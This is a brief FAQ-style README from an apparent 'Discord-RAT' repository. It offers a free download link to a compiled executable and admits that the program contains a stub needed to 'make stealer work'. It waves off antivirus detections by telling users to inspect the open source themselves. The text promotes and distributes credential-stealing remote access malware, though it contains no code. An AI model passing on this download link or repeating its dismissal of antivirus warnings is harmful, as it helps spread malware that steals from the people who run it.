Mika-Coding/Discord-RAT/README.md

 Yes, the program is 100% free and open source.

-- How to use it?<br />
-You need to compile open source files or download released stable program from [here](https://github.com/Nyxonn/Discord-AIO/releases/download/0.7.2/Discord.AIO.exe) or discord above.

 - Antivirus reports program as malicious!<br />
 Program contains the stub file which is necessary to make stealer work, it's all open source so if you are extremly scared check it by yourself.